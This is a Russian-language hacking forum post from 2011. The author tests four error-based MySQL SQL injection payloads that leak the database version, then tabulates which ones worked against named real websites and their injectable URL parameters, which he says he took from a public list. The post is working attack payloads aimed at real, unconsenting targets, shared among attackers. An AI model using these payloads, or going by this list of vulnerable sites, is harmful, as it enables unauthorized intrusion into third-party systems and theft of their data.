Показать сообщение отдельно
Старый 29.03.2011, 10:28   #19
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Универсальный запрос, это интересно, надо потестить.
Взял скули из паблика (несколько последних страниц) и проверил четыре запроса

Код:
=(1)=
1+and+row(1,1)>(select+count(*),concat(version(),0x3a,floor(rand(0)*2))+x+from+(select+1+union+select+2+union+select+3)a+group+by+x+limit+1)+--+

=(2)=
1+in+(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(version(),@:=@-1))--+-

=(3)=
(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+

=(4)=
1+in+(select(@:=1)||@+from+(select+1+union+select+2+union+select+3)k+group+by+concat(@@version,!@)having@||min(@:=0))--+-
Отсеял результаты, когда сработали все запросы или не сработал ни один,
результаты в табличке
Код:
--------------------------------------------------------------------------
URL                                               |=(1)=|=(2)=|=(3)=|=(4)=|
--------------------------------------------------|-----|-----|-----|-----|
http://www.ecss.bb/viewproduct.php?pid=           |  -  |  -  |  +  |  -  |
http://www.merseytrusts.org.uk/list_trust.php?id= |  -  |  -  |  +  |  -  |
http://www.mgce.uz.ua/post.php?id=                |  -  |  +  |  +  |  +  |
http://www.isrm.co.uk/jobs/job_details.php?job_id=|  +  |  +  |  -  |  -  |
http://www.magadangorod.ru/index.php?do=form&id=  |  -  |  +  |  -  |  +  |
http://www.globalalliancepr.org/event.php?id=     |  -  |  +  |  -  |  -  |
http://rakurs.rovno.ua/info.php?id=               |  +  |  +  |  -  |  +  |
http://www.wollemipine.sk/page.php?id=            |  +  |  +  |  -  |  -  |
--------------------------------------------------------------------------
Примечание, на www.magadangorod.ru скрипт опознал запрос =(1)=, сигналом [Hacking attempt!]

Итого: универсального запроса пока не видно.
nikp вне форума   Ответить с цитированием